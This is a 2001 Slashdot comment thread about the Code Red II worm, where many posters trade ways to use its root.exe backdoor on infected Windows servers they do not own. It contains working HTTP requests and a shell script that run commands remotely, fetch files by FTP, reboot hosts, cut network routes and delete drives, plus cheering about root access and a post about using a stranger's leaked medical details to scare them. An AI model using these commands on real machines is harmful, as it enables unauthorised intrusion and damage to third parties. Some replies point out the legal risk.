    This is freakin incredible!!! I can't believe how easy it is to get root access to these Win2K boxes... Whoever invented this must be on our side! I have tried some of the commands posted here and can do directory scans and copy files to my console. This is freakin coool!

    Has anyone figured out how to shut the friggin things down. It would sure help the health of the network, the ISP's don't seem to realize the threat. I have called Pacific Bell and Covad and other ISP's and all the tech people do is mumble and say that they don't understand what I'm talking about. I tried to explain to them that these machines are spreading an infection, but they were just lowly tech support people... The real people were at home, or unreachable.

    Someone figure out a way to shut down the windows boxes. I think this is the best solution...

  94. Re:huge cable modem hits by Anonymous Coward · · Score: 0

    I don't have apache either (laugh if you like, but I am on a windows box), and I use netcat to capture each probe. eg, nc -vvlp 80 > worm.capt, then use less or if you have to type, to read the code body. (Note, netcat is available for all versions of windows AFAIK, and unix.)

  95. Re:File download script by Troed · · Score: 1
    Using someone's public webserver is illegal?

    You're sending GET requests ..

  96. Re:this sucks by raju1kabir · · Score: 1
    what i don't look forward to is probably an increase in this kind of crap as XP rolls out with raw socket support.

    What on earth does raw socket support have to do with anything discussed here? Do you even know what it means?

    --
    "Patriotism is your conviction that this country is superior to all other countries because you were born in it." -- GBS
  97. Re:Apache users Create default.ida 5mb!!!! by Anonymous Coward · · Score: 0

    No way, you'd just be hurting yourself by clogging up your pipe -- the goal is to wast time, not to kill your connection. I see no reason why this wouldn't work just as well: #!/usr/bin/perl use FileHandle; STDOUT->autoflush(); $message = "Content-type: text/plain\n\nAm I speaking too slowly?\n"; @mess = split( / */, $message); for ( $i=0; $i

  98. This will put a bandaid on the problem: by Telek · · Score: 2, Informative

    try this:

    GET /scripts/root.exe?/c+echo+ren+root.exe+badrootexpl oit+>+fixme.cmd HTTP/1.0
    GET /scripts/root.exe?/c+echo+echo+^>+root.exe+>>+fixm e.c md HTTP/1.0
    GET /scripts/root.exe?/c+echo+attrib.exe+root.exe+%u00 2Br+>>+fixme.cmd HTTP/1.0
    GET /scripts/root.exe?/c+echo+dir+>>+fixme.cmd HTTP/1.0
    GET /scripts/root.exe?/c+type+fixme.cmd HTTP/1.0
    GET /scripts/root.exe?/c+fixme.cmd HTTP/1.0

    this way it renames the old root.exe, creates a new dummy one, and write protects it so it can't be overwritten by a simple copy command.

    --

    If God gave us curiosity
    1. Re:This will put a bandaid on the problem: by Anonymous Coward · · Score: 0

      Might land your ass in jail, too.Joe Sixpack ain't too likely to distinguish between a "Good Samaritan" and a "criminal hacker" now that CNN is neglecting to report the fact that the fucking infected machines are *ATTACKING* ours, and *ADVERTISING* their IP's to anyone who maintains server logs, and are quoting Alan Spaller of Security Focus as saying "We're seeing a wave of scanning [for infected machines]".

      Nope, your average Windows luser is going to be dead certain you are doing to him exactly he would think of doing to you. The only thing he'll be more certain of is his own total lack or responsibility in the matter. Who has a vested interest in pandering to the undeserving interests of irresponsible people, particularly rich ones? Does it have three letters, you ask? I thought you looked fairly intelligent.

      Hang on to your hats, folks.It's going to be an interesting ride. Hope Skylarov gets out today, too, otherwise it's going to be a long, long time.

      Rogue Bolo

    2. Re:This will put a bandaid on the problem: by Anonymous Coward · · Score: 0

      Or at least wipe their logs while you're at it. :-)

    3. Re:This will put a bandaid on the problem: by Anonymous Coward · · Score: 0

      No, their logs are what proves you didn't do anything "bad." You want to hope those stay intact as long as possible (or at least until your trial ;).

  99. Re:huge cable modem hits by onepoint · · Score: 2

    I'm having 2 to 4 alerts every minute from the @home network or road runner.

    It's crazy.

    onepoint

    --
    if you see me, smile and say hello.
  100. these will do.. by LinuxHam · · Score: 1

    net stop iiswww

    route delete 0.0.0.0

    (the equivalent of) ifconfig eth0 down

    and I saw something like 'iisreset /y' go by before..

    --
    Intelligent Life on Earth
    1. Re:these will do.. by Anonymous Coward · · Score: 0

      And don't forget del /r c:\

  101. They deserve it by zexxxx · · Score: 1
    Its really shoddy if different strains of a worm can use the same exploit over a couple of weeks. For the amount of money that is spent in trying to keep computers secure, this is insane.

    I guess most of the hits i've taken are more from home users. Only God knows why anyone would need a server OS for personal use.

    Good ol' linux!

  102. Re:Code Red Infects Slashdot! by Anne_Nonymous · · Score: 1

    Would someone post an actual link to this please. Thx -Anne

  103. Re:potential for something worse by Unknown+Bovine+Group · · Score: 1
    LOL

    GET /SarahConnor.ida?XXXXXXXXXXXXXXX...

    --
    m00.
  104. Microsoft to World: Dont blame us for code red! by spike666 · · Score: 1
    an article pulled from the Phillipines Inquirer quotes a Microsoft rep (granted, hes just the phillipines head) as saying that "it is wrong to say that Microsoft software is inherently vulnerable to security threats"

    the article is available on the Hoovernews website

  105. Re:Try pulling the IP up in your browser by cavemanf16 · · Score: 1

    I actually tried this in Konquerer a couple days ago. Didn't have any immediate results, but somehow www.rob.com managed to set a cookie on my Mandrake8 box, which I readily found out was most likely due to my trying to find CodeRed'ed servers that had hit me. Funny thing is, I never received the popup requesting me to allow the cookie when surfing for his IP, and I have Konq set to Ask Permission for every cookie placing attempt. Weird.

  106. Re:Aural Feedback by Brett+Viren · · Score: 1
    Consider using the command
    tail -f log | grep defalt.ida >crhits.log
    in conjunction with the "select(2)" system call (available in Perl), for improved efficiecy.
  107. Bandwidth wasted? by mwillems · · Score: 2
    Wasted? It's like airplane seats: once it's not used, it's gone forever. Not a renewable resource. If a particular pipe is 90% full as opposed to 10% full, there's very little difference.

    So unless it caused noticable congestion it makes no difference in that respect.

    --

    ---
    BDOS ERR ON A:>
  108. How to be a nice guy by Pilferer · · Score: 1

    If you're a nice guy, try the following (or something similar) to let the victim know they're infected:

    http:// {infected ip here } /scripts/root.exe?/c%20echo%20f>c:\windows\desktop \ warning%20you%20have%20the%20code%20red%202%20viru s%20your%20computer%20attacked%20mine%20please%20g et%20a%20virus%20scanner.txt

    When the victim sees something along the lines of "You've got a virus, you attacked me, go clean your system up!" sitting on their *desktop* they'll * NOTICE * it!

    If you try to run "delete root.exe" you'll get an access denied..

    1. Re:How to be a nice guy by llaatteerr · · Score: 0, Offtopic

      were you up all night thinking of that one, bright boy?

    2. Re:How to be a nice guy by Anonymous Coward · · Score: 0

      Why not see if you can run a net send command to pop up a message in a dialog box on their server, since you get the name when you telnet in to run root.exe? This way you have up there, playing in the "\windows\desktop" directory, wouldn't work at all on an NT/2000 setup (with a "\winnt" directory, plus profiles, etc), which is were all your IIS servers are.

    3. Re:How to be a nice guy by Anonymous Coward · · Score: 1, Insightful

      too bad winnt machines dont have a "c:\windows" directory. On NT4 try "c:\winnt\profiles\administrator\desktop" and on win2k and winxp try "c:\documents and settings\administrator\desktop" you could also replace administrator in both of those paths with "all users" so that it shows up on the desktop on all users on the system

    4. Re:How to be a nice guy by Anonymous Coward · · Score: 0

      Try NET SEND /DOMAIN "Patch your damn IIS server, morons!", which could cause a pop up on every system at the company.

  109. Re:I'm sorely tempted . . . by Phroggy · · Score: 1

    I stand corrected. I got it to work on a different server. Only one, though; most of the rest I've tried don't seem to have root.exe installed.

    --
    $x='S24;r)>63/* h@<5+oZ)32"5cz';$me='phroggy'x$];
    $x=~y+ -xz+\0-Tx+;print$_^chop$me for split'',$x;
  110. Re:Aural Feedback by d3jp_ · · Score: 1

    Great, you're making a sound on the newer Code Red variant... What about the old one? I'm still getting about a 4:1 ratio of original code red to anything else... If you don't have a web-server running, but STILL want to log Code Red, use websnarf... A perl implementation to log attempts to access port 80 [ or whatever port you want I guess... ] http://www.unixwiz.net/tools/websnarf.html Yes, it runs under ActivePerl too...

  111. Re:fp by c_g_hills · · Score: 0

    first reply to first post!

  112. Re:The Whitehouse.gov lesson by beable · · Score: 1

    And now that whitehouse.gov has installed Linux, the Code Red Worm no longer exists, right? And everybody knows that Distributed Denial of Service attacks don't work against Linux boxes, right?

    Mod that sucker back down.

    --
    ...
  113. Gotta do it by Anonymous Coward · · Score: 0

    What happen??

    Someone @Home set us up the worm.

    We GET /default.ida?x=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXX HTTP/1.0

    What you say?!?

    Default.htm turn on.

    How are you gentlemen?

    All your root.exe are belong to us

  114. Re:Sadmind/IIS unicode worm already did that by BCoates · · Score: 1

    Sorry, you're right about that. Different IIS vulnerability (ugh), same sort of backdoor installed.

    Either way, someone who finds a wormed IIS should remember to blow away and reinstall the box (instead of just patching IIS and cleaning up the webroot), since either the vulnerability or the backdoor could have installed who-knows-what on it in the meantime...

    --
    Benjamin Coates

  115. Re:Nasty as it gets? by LinuxHam · · Score: 1

    IANAL,BMSI (But my sister is - Stanford Law, at that!)

    So I asked her if MS could be sued due to the poor quality of their software, and the millions of dollars spent restoring businesses to normal operations. She said that they absolutely cannot be sued for the resulting conditions based upon misuse of their product. Same goes for any product manufacturers.. gun, automobile, kitchen knives, whatever.

    They would have to continue to produce software that was known to contain bugs and major security risks, and here's the key: never release any updates or patches to try to resolve the situation. You have to admit, they've release tons of patches this year alone. They *are* trying to resolve problems as they come up. At least a little bit.

    --
    Intelligent Life on Earth
  116. Re:Repository of infected IP addressen by BMIComp · · Score: 2

    Well, right now a lot of people are sending their logs to Dshield, who then notify the owners of the infected machines. grep default.ida access_log* | mail -s 'APACHE' redalert@dshield.org

  117. Re:Ummm, no actuall by Anonymous Coward · · Score: 0

    Were they unconcious, or had they suffocated to death? How would you tell?

  118. Re:Now that I've got access to hundreds of boxes by Hilary+Rosen · · Score: 2

    I get this. I think it means IIS is running on a desktop version of Windows (NT4WKS or W2KPro) rather than a server.

    ===

    The page cannot be displayed

    There are too many people accessing the Web site at this time.

    ---

    Please try the following:

    Click the Refresh button, or try again later.

    Open the 65.29.102.77 home page, and then look for links to the information you want.

    HTTP 403.9 - Access Forbidden: Too many users are connected

    Internet Information Services

    ---

    Technical Information (for support personnel)

    Background:

    This error can occur if the Web server is busy and cannot process your request due to heavy traffic.

    More information:

    Microsoft Support



    --
    Yes, the nick is flamebait
  119. Re:The Breaking Point by Anonymous Coward · · Score: 0

    Let me get this straight

    Some fuckwit with the brains of a monkey and the restraint of a drunken rhino writes a piece of code which can only have a malicious purpose to attack a known and documented flaw in the most common web server out there (one which any competent moron should have sufficiently repaired months ago i should point out) and he is a hero and MS and the government are veil and we should shut them down and etc etc and oh dont forget let sue microsoft?

    I have a better idea - lets find the motherfuckers and i personally will volunteer to cut off their balls with a butter knife - they are pathetic little shits who hide behind their virus and no doubt get huge hardons with it.

    These are the sort of people who give us programmers and hackers a bad name - the malicious fuckwits we spend time and energy protecting our networks against - they ARE NOT FUCKING HEROS !!!

    Open source needs to wake up and realise that they are never going to do the following.

    1. Take over every server in the world - you complain because MS has a monopoly but you would like to see one yourselves - does the term HYPOCRITE mean anythin
    2. This is not a crusade - no one gives a fuck in the real world and you are never going to nackrupt MS - just make your choice and move on
    3.Take over the desktop -users and companies want just the opposite to linux a standardised and easily controlled and implemented system that is simple to use and secure and rollout - linux offers some of these things but not the important ones and is not user friendly to the home user level - its a great OS for servers and the enthusiast and i love it but it will never be everything to all people.
    4. Change the world - its bits and bytes not gfeeding the poor - you do it to make money or get famous or whatever - get over it - this isnt uni anymore

    The fact is this worm is a product designed by cowards to run a DDOS attack againt the white house (like that would fucking change anything) and then modified by other cowards to do pyhsical damage to servers and computers - its nothing more than a low act and no different to raping someone in my mind except it it the ultimate hands of coward act

    'yeah this will fuck em' says Nicky the Nerd as he launches the malicious code 'i own em now - im so sexy'

    what a wank - what a prick - you lot should be ashamed

    Oh and call me a troll - if i posted this under my login BOOM some evangelist with a complex will hit me with a karma stick for having the balls to say something which doesnt agree with the sheep - i thought the whole point of slashdot was to make comments that are different from the norm

  120. Re:Experiment by Anonymous Coward · · Score: 0
    Are you sure you even connected it to the internet? Or do you just have a relatively secure /16 that you are on. I am on dialup, and I am seeing new attempts every few minutes. I can't believe that you had to wait 1 hour and still haven't seen it.

    If you really want, I have a netcat capture of the worm, I could email it to you and you could infect yourself, just for shits and giggles. But note that the thing trojans your system, so you better have a good clean up procedure.

  121. Re:Origin of Code Red? by jstockdale · · Score: 1

    South Island, but no sorry, try the extreme sports capital of NZ ;) and no we don't get Mountain Dew here. We do however get Dr. Pepper imported from the States so go figure.

    --
    **AA: a bunch of mindless jerks who'll be the first against the wall when the revolution comes
  122. Re:My prediction... by JimPooley · · Score: 1

    Three more versions surely..

    LLLLLL...
    IIIII....
    and
    UUUUUU...

    What's that spell!!!

    --

    "Information wants to be paid"
  123. Re:huge cable modem hits by Anonymous Coward · · Score: 0

    I am also on nash1.tn.home.com and since around midnight on 8/6 I have logged around 178 access attempts. I noticed my data light flickering like crazy when I got on the system this morning. Oh well welcome to the Internet cicra 2001.

  124. Re:I'm sorely tempted . . . by IdentityCrisis · · Score: 1

    ummn, I think that in NT you have to change the number to hex meaning instead of 1 you'd use 0x1

  125. How does codeRed infest? by Umanity · · Score: 1

    I understand that this worm exploits the buffer overflow bug in IIS. Has anybody disassembled the program to understand how it operates. If so, please contact me...

    I have determined that if we could insert a payload on a codeRed terminator, we could shut down the infested machine by calling the winAPI function:

    ExitWindowsEx(EWX_POWEROFF)

    This should work, assuming the process has SE_SHUTDOWN_NAME priveleges. I don't have IIS, but I am looking at MSDN on a Win2000 machine now.

    I would like to understand the payload, it seems like a sequence of unsigned integers. They occur just past the stack, so when the function exits it returns to the inserted code. If we could insert the call to ExitWindowsEx() we would be HOME FREE!

    Contact me @ michaeluman@softwaremagic.net

    --

    Michael A. Uman
    Sr Software Engineer
    softwaremagic.net

    1. Re:How does codeRed infest? by Anonymous Coward · · Score: 0

      You wanted to know if this worm has been reverse engineered. Well it has. View the results here:http://securityfocus.com/templates/archive.pi ke?fromthread=0&end=2001-08-11&list=1&mid=201885&s tart=2001-08-05&threads=0&

  126. Re:CmdrTaco runs Windows by mpe · · Score: 2

    I think the notion is that it affects non-Windows people as recipients of unwanted random files. (Code Red affects non-Windows people as port 80 hits, too, but that's relatively trivial, and unlikely for minimally-connected dialup people.)

    Except that the strange HTTP requests it puts out cause problems with some embedded webservers...

  127. bandwidth wasted by Anonymous Coward · · Score: 0

    Bandwidth gets wasted when it's not utilized. I think you meant to say, "But imagine how much bandwidth Code Red and Sircam have 'utilized' in the last few weeks?"

  128. Re:Working PHP counter by Anonymous Coward · · Score: 0

    even better... take it off the net if it gets a dhcp address:

    ipconfig /release

  129. Re:This is old news... by Anonymous Coward · · Score: 0

    Isn't this a grand day, not a bad day? Just think, you now have 530 new shell accounts :) Imagine all the fun you could have.

  130. Re:The Breaking Point by Ridge2001 · · Score: 3, Insightful
    Does anybody remember a few months ago when everybody around Slashdot was feeling sorry for themselves because it seemed that Open Source software was getting hard hit by security problems?
    • sourceforge.com was hacked
    • themes.org was hacked
    • apache.org was hacked
    • the ramen worm
    • the lion worm
    • the knark rootkit
    Things were so bad that Microsoft felt cocky enough to make claim that open source software has "inherent security risks".

    Well, you can quite rightly laugh at Mundie now for his audacity, but it's ridiculous to start calling for lawsuits against software makers. Do you really believe there is never going to be another exploit targeting open source software? Do you want the creators of that open source software to be sued too when that happens?

    Microsoft is a big company, and it can afford lawsuits like that. But if, say, the creators of BIND were sued for an exploit, that would probably be the end of BIND. And it's unlikely anyone would be eager to write an open source replacement, with the threat of lawsuits looming over any potential open source project.

  131. Re:huge cable modem hits by Siberius · · Score: 1

    Mine too has my ADSL modem light up like a christmas tree. Even with my computers unplugged the adsl light keeps flickering. Is there any way to stop this?

  132. Your Incomplete .sig... by Anonymous Coward · · Score: 0

    Leftist: Force the world into slavery. Liberal: Vote the world into slavery. Libertarian: Let us alone!



    You forgot one:

    Capitalist: Sell the world into slavery.

  133. Re:CmdrTaco runs Windows by M.+Silver · · Score: 2
    Except that the strange HTTP requests it puts out cause problems with some embedded webservers

    Yabbut that's *still* not "all of us," as with SirCam.

    Though, interestingly enough, I haven't seen SirCam. I run a mailing list server, and usually I get a nice sampling of darn near everything caught in the spamtrap... I saw Melissa from a European subscriber way in the wee hours of the morning, which was handy since my then-employer needed a sample to feed to its mail filter. And I still see Snowhite once every couple of days. But no SirCam.

    Not that I'm complaining, mind you...

    --

    Slashdot's token middle-aged housewife
  134. Re:I'm sorely tempted . . . by Magius_AR · · Score: 1
    There is a way (I have it written down at home) to do this. I stumbled across it when looking for a way to coem up with a shortcut icon to doubleclick to shut down my machine (rather than the standard Start, Shutdown method). It involves using rundll32 with a specific command and some options (offhand, I can't remember what they are) And it works quite nicely too (tried it myself)...it pretty much just kills everything and shuts down (you don't get those annoying "waiting for task to end" boxes)

    Magius_AR

  135. Code Red Infects Slashdot! by Mdog · · Score: 5, Funny

    It's gotten to the editors! It's everywhere! It causes itself to be posted multiple times per day! Hide the women and children!

    1. Re:Code Red Infects Slashdot! by Kwelstr · · Score: 1

      Microsoft is a bad neihbor, whose allowed their yard to fill with filth and trash, subjecting the people around them to the vermin and roaches that breed within their unkempt property. It is on this day that the internet will begin to sputter and fail in places due to the tremendous burdon Microsofts incompetence has placed upon it.
      Microsoft's products spew pollution into the information space like a burning mountain of tires.


      Yeah and the funny thing is, they may be doing it on porpose, seriously. Just check out the last Cringely article at PBS on this subject.
      http://www.pbs.org/cringely/pulpit/pulpit20010802. html

      --


      ~~~Please pass the salt, I hate unsalted MD5s :-/
    2. Re:Code Red Infects Slashdot! by Anonymous Coward · · Score: 0

      I'm sure when the hindenberg burned, it got multiple mentions on slashdot. Or the fall of the roman empire
      HAHAH!!!! ROFL!! I actually read the first sentence straight-faced! NEED MORE CAFFEINE!

      Good one dude. Very, very good.

    3. Re:Code Red Infects Slashdot! by cyberdonny · · Score: 2
      > It is on or near this day that Microsoft's software became, without a doubt, a public nuisance to the internet.

      I hate to defend Micro$oft, but at least in this instance, they are only a nuisance to themselves (and to their customers). Indeed, Code Red only infects IIS, not Apache nor any of the many other brands of Webservers. And please don't bring out that old canard of CodeRed eating bandwidth and bringing the Internet to a crawl: this one has been debunked here: the real reason for the July 10th slowdown was... a train wreck!

    4. Re:Code Red Infects Slashdot! by thrig · · Score: 1

      Code Red has a nasty side effect of knocking over (the poorly written) embedded webservers in hardware devices, such as the HP 4000 or the Cisco 67* DSL router, so it's not just Microsoft products. See the "two birds with one stone" thread, recently featured on BugTraq.

      I feel Microsoft products have been a public nuisance since they introduced the deplorable notion of active content in a document (word macro virus)-- forcing me to waste time installing anti-virus software to deal with the symptoms.

    5. Re:Code Red Infects Slashdot! by CodeRed · · Score: 1, Funny

      I have been here a while my friend.

      I think for my next amazing trick, I'll send a bit of news about Code Red from CodeRed.

      --

      --
      CodeRed, the lower user #. No relation to SirCam.
    6. Re:Code Red Infects Slashdot! by IronChef · · Score: 2


      Here are some of the sites that have tried to infect me. These servers all had live content when I last checked. Very humorous.

      http://65.3.197.16/

      http://65.3.145.164/ ('welcome to the all porshe page!' Hilarious, GeoCities quality web site.)

      Most of the rest of the machines that hit me had IIS "under construction" signs up.

    7. Re:Code Red Infects Slashdot! by Umanity · · Score: 2, Informative

      Notice that this article was written before the appearance of CR2, the more virulent version of Code Red. I too believed that the worm was "Overhyped" in the media. But as of yesterday, I saw a four-fold increase in the attacks from the worm. I think the new version could be quite a problem. I have been tracking down systems infecting others and calling the sysadmin. I think we need to pro-actively stop this thing by alerting sysadmins that their machines are compromised.

      I have noticed that a lot of the recent hits have been coming from my Service Providers address space. And the frequency of attacks are increasing. On the 2nd of August I only got about 30 hits, about 1 every hour. On the 4th of August I got over 80 hits, thats about 4 hits an hour.

      This thing is gaining momentum... Don't be foolish and underestimate it...

      --

      Michael A. Uman
      Sr Software Engineer
      softwaremagic.net

    8. Re:Code Red Infects Slashdot! by AstroJetson · · Score: 1

      I'm not exactly sure what to look for, but I'm noticing a lot of entries in my system log like this:
      Packet log: input DENY ppp0 PROTO=6 65.14.239.180:3281 [my IP]:80 L=48 S=0x00 I=29746 F=0x4000 T=118 SYN

      That IP translates to cj40900-a.alex1.va.home.com. If I try to access it w/ a web browser I get:
      The page cannot be displayed
      There are too many people accessing the Web site at this time...clearly a MS error message due to the link to Microsoft Support at the bottom of the page.

      nmap identifies the OS as Windows 2000 Pro RC1/W2K Advance Server Beta3

      Is this CR? I'm guessing that it is.

      --
      Admit nothing, deny everything and make counter-accusations.
    9. Re:Code Red Infects Slashdot! by MadAhab · · Score: 2
      While it's sorta alarmist, it *could* be true. But Cringely provides his own Occam's razor right in the same article; Microsoft allows poor security because improving it would not increase their market share. No one chooses a Microsoft product on security criteria, and the few people who choose against it are the folks who have

      The resistance to even installing support at the ISP level for a Microsoft networking protocol would be much larger than he accounts for. For one thing, I've seen ISPs belly flop on flash upgrades before. Now figure that such a protocol would have to be in place at every hop along the way. Even if it were encapsulated in TCP/IP, this would bring performance down and require at least the other end to use the protocol, and that's a pretty thin wedge.

      Their chances of succeeding in such a takeover would be exceedingly poor, at least without legislative action, and Microsoft would come out a real loser in that kind of political battle in DC. The number of "all business is all right, all the time" nitwits in Washington can be easily calculated by counting bow ties, while Microsoft's enemies are many and not so easy to identify.

      Cringely's actually a pretty smart guy, but he's wrong on this one.

      --
      Expanding a vast wasteland since 1996.
    10. Re:Code Red Infects Slashdot! by No-op · · Score: 1

      I'm on the RoadRunner network, and my little freebsd desktop has received 644 hits since august 1. 566 of those TODAY, on august 4th, almost completely consisting of the coderedII version.

      of course this makes me regret linking /default.ida to a 500mb random text file :)

      --
      EOM
    11. Re:Code Red Infects Slashdot! by Anonymous Coward · · Score: 0

      Here's a better idea: why not create a default.ida with a redirect to Micro$oft's site? I added the following to mine: <META HTTP-EQUIV="Refresh" Content="0; URL=http://www.microsoft.com/technet/security/bul<nobr>l<wbr></wbr></nobr> etin/MS01-033.asp"> I see it as the equivalent of rubbing their collective nose in their own poop.

    12. Re:Code Red Infects Slashdot! by Anne_Nonymous · · Score: 1

      Thank you. Also of interest to those with POS Cisco 675's is the following link on correcting the problem:

      http://support.visi.com/dsl/codered.html

  136. Finger of God by LinuxHam · · Score: 2, Funny

    Time the long-awaited "Finger of God" script. Fdisk 'em!

    --
    Intelligent Life on Earth
  137. Re:Best Downloadz Ever by Anonymous Coward · · Score: 0

    You win the funniest post in thread award. Congratulations, and keep up the good work.

  138. Eh... by geggibus · · Score: 1

    When will somebody modify the worm, so it downloads and install the patch.. then searches for other valnuerabel victims and infect them... ;)

    /Geggibus "Ehh..."

  139. Sircam is sending me juicy stuff! by Anonymous Coward · · Score: 0
    Some luser in San Jose has an infected machine that seems bent on sending my wife every file it can find on the person's system. Most of them are lame jokes saved to disk, but mixed in there is some good personal info, like details of medical conditions (lupus, plus things I've never heard of before), home phone numbers of friends and relatives, a interview followup letter that the person's company probably doesn't know about, etc. I also have this luser's phone number, and tomorrow they're getting a call.

    I haven't decided whether to start with the tongue-lashing and threats for wasting my time, then to get their attention with the personal details, or to start with the personal details, just to get the freakout reaction.

    Hopefully the luser will be too scared to ever start up a Microsoft program ever again.

    (Alas, no credit card numbers yet, then I could just pay myself for the time spent on this... :-) )

  140. Re:Ummm, no actuall by Anonymous Coward · · Score: 0

    Some studies indicate that plants feel pain when you cut them. What's next?

    'Freedom for Mushrooms'?

    All you cruel plant eaters should stop the hurt and pain NOW!

  141. Comments on an Anti-Worm by Nater · · Score: 0, Redundant

    I've been watching my apache logs grow with requests for default.ida?blahblahblah and I had a weird thought last night. CR most likey has some bugs in it. How hard would it be to dissect a copy, find an exploitable buffer overflow, and write a CGI script that counter-attacks CR? I don't think it would be any harder than finding the original default.ida overflow. Or, if it really is making a shell available, why not just have the anti-worm log in and nuke CR?

    --

    I like to play children's songs in minor keys.
    "We're all sons of bitches now." --J. Robert Oppenheimer

  142. File download script by nebby · · Score: 5, Interesting

    (Copied from the other thread, for those who are working on a way to fix this worm)

    I played around for a few hours with this, trying to make a ghetto script that would fix the servers. There's no way for me to be sure my other stuff works, but the thing I did get working was a script to download files to the infected server from an ftp site.


    #!/bin/sh
    # Code Red ][ Download File script
    # Usage: dlfile.sh infectedIP filename
    #
    # Please set the $ftp and $dir values to
    # the ftp and directory of the patch and shutdown repository

    # For ftp.youhavesetup.com
    FTP="ftp%2eyouhavesetup%2ecom"
    # Directory /pub/cr
    DIR="%2fpub%2fcr"

    echo GET /scripts/root.exe?+%2fc+echo+bin+%3etmpfile | telnet $1 80
    sleep 1
    echo GET /scripts/root.exe?+%2fc+echo+get+$DIR%2f$2+%3e%3et mpfile | telnet $1 80
    sleep 1
    echo GET /scripts/root.exe?+%2fc+echo+ftp+%2dA+%2ds%3atmpfi le+$FTP+%3edlfile%2ecmd | telnet $1 80
    # Note that slashcode inserts a space in the string 'tmpfile' on both these lines, remove before running
    sleep 1
    echo GET /scripts/root.exe?+/k+dlfile%2ecmd | telnet $1 80


    I tried setting it up and got the servers to download the patches, but I can't be sure that they are actually run. (I don't have an infected machine to test.) Also, I was unable to figure out a way to get the machines to reboot or restart IIS. It appears root.exe has limited permission in what it can do (as another poster or two stated.) There might be hacks that will do what I want to, but I'm too tired to mess with this anymore :)

    --
    --
    1. Re:File download script by Molina+the+Bofh · · Score: 2

      > I played around for a few hours with this, trying to make a ghetto script that would fix the servers. There's no way for me to be sure my other stuff works, but the thing I did get working was a script to download files to the infected server from an ftp site.

      The idea is nice, the intention is louvable, but I believe it would be considered illegal in most countries. After all, you are actually using their machine without permission.

      The argument that you're doing this for their own good is the same one that crackers use.
      -"Oh, we're doing them a favour, showing their vulnerabilities."

      --

      -
      Roses are #FF0000, Violets are #0000FF, find / -name '*base*' |xargs chown -R us && mv zig greatjustice
    2. Re:File download script by nebby · · Score: 3, Interesting

      Yeah I realize that. I'm not doing anymore "work" on this, but I figured I might as well post it. I figure I painted myself red enough on one or two win2k cable modems for one lifetime now.

      The intention isn't the same as crackers though, writing a script to patch and restart IIS not an in your face "showing their vulnerabilities" crack, it's basically a free-of-charge windows update complements of whoever runs the script. I'm not saying that it is legal, but it's definitely not a "ha ha I got rewt your windows box is insecure" crack. It a "I noticed your computer is insecure, I fixed it. Have a nice day, and don't let it happen again." crack.

      If anyone actually sat and wrote a complex script to fix these computers, I *highly* doubt that a sane judge would pound the gavel on them, especially if the good they do is significant enough and measurable. (Personally, I would *love* to see someone outside of Microsoft do this before MS gets the chance to issue a fix and once again look like the good guys even though it's their original fuck up.)

      --
      --
    3. Re:File download script by elefantstn · · Score: 2
      The idea is nice, the intention is louvable, but I believe it would be considered illegal in most countries. After all, you are actually using their machine without permission.

      Are you sure? I mean, it's not like you're cracking into people's boxes randomly to do this; only computers that try to attack your Apache server are effected. Of course, thieves have successfully sued for unsafe property for injury themselves during attempted burglaries, so who knows...

      --
      If it ain't broke, you need more software.
    4. Re:File download script by Erasmus+Darwin · · Score: 2
      I believe it would be considered illegal in most countries.

      What if one were to change one's web server's main page to advertise an automated Code Red fixing service, conveniently located at http://www.example.com/default.ida?

      I suppose it probably wouldn't hold up in court, but it'd still be amusing.

    5. Re:File download script by M.+Silver · · Score: 2
      The idea is nice, the intention is louvable, but I believe it would be considered illegal in most countries. After all, you are actually using their machine without permission.

      If it was initiated by their machine (that is, by the default.ida request), that might be questionable, though. Not that *I'd* want to test it out in court, but I wouldn't dismiss it out of hand.

      --

      Slashdot's token middle-aged housewife
    6. Re:File download script by Xemu · · Score: 2, Informative
      Also, I was unable to figure out a way to get the machines to reboot or restart IIS


      Rebooting a compromised IIS server is trivial, just add this to your script

      (echo "GET /scripts/root.exe?/c+iisreset+/reboot HTTP/1.0\n\n\n\n" ; sleep 5) | telnet $1 80

      or you could substitute iisreset/reboot with one iisreset/stop and one iisreset/start for less impact on the system.

      --
      Tell your friends about xenu.net
    7. Re:File download script by Mike+Schiraldi · · Score: 2

      or you could substitute iisreset/reboot with one iisreset/stop and one iisreset/start for less impact on the system

      Um, if you stop the IIS server, how exactly are you going to send it a start command?

    8. Re:File download script by asackett · · Score: 1

      Hmmm... If you connect to my box and request a file named foo.bar, and my box sends you a file named foo.bar, but it's not got the content that you expected, am I using your computer without your consent?

      --

      Warning: This signature may offend some viewers.

    9. Re:File download script by camusflage · · Score: 2

      Uhhhh, Yeah. Tell it to Max Butler (aka Max Vision). He did the same thing for the bind worm, releasing a worm that fixed the hole. He's now doing 18 months with three years of probation, plus $60k in restitution.

      Read here if you're still thinking of releasing this creature into the wild.

      --
      The truth about Scientology, Xenu, and you: Operation Clambake
    10. Re:File download script by Javit · · Score: 1

      Tell it to Max Butler (aka Max Vision). He did the same thing for the bind worm, releasing a worm that fixed the hole.

      Butler's worm also left a backdoor on all the systems it "fixed." Hardly synonymous with nebby's intent. However, I do think releasing another worm to counter Code Red is a bad idea. It's likely that doing so would result in as much ill will as good for the author of the patching worm.

      See this Wired article for more info about Butler's case.

      -Javit

      --
      Support NRA, America's oldest civil rights group.
    11. Re:File download script by cyberwench · · Score: 1

      I don't know... that might be the key to the whole thing. After all, their server requested the file. =)

      --
      ~ Leilah
    12. Re:File download script by Caspuh · · Score: 1

      Ummm, MS released a fix for this over a month ago.

    13. Re:File download script by camusflage · · Score: 2

      I suppose it probably wouldn't hold up in court, but it'd still be amusing.

      Doesn't even hold up technologically, let alone in court.

      In theory, it sounds good. You're ignoring that the infection comes from a malformed request, not response. To make it work, you'd need to take the IP issuing the request, and fire a request back at it containing your payload.

      "Ummm, I was just seeing who was talking to me. I didn't know they were vulnerable!"

      --
      The truth about Scientology, Xenu, and you: Operation Clambake
    14. Re:File download script by spectral · · Score: 1, Funny

      forget another worm, just make a counter-attack, not a counter-worm. you're scanned. In retaliation, fix it. Self-defense argument anyone?

    15. Re:File download script by Erasmus+Darwin · · Score: 2
      You're ignoring that the infection comes from a malformed request, not response.

      Well, the argument is that the counter-attacker would be advertising a service which the Code Red worm then "requests".

      A analogy might be to the telephone service providers that registered names like "I don't care", thereby inadvertently foisting their services upon someone who said that phrase for different reasons.

      Similarly, the counter-attacker would be making a request to "/default.ida" the request means by which a machine can indicate that it desires to have the Code Red worm backdoor exploited on itself.

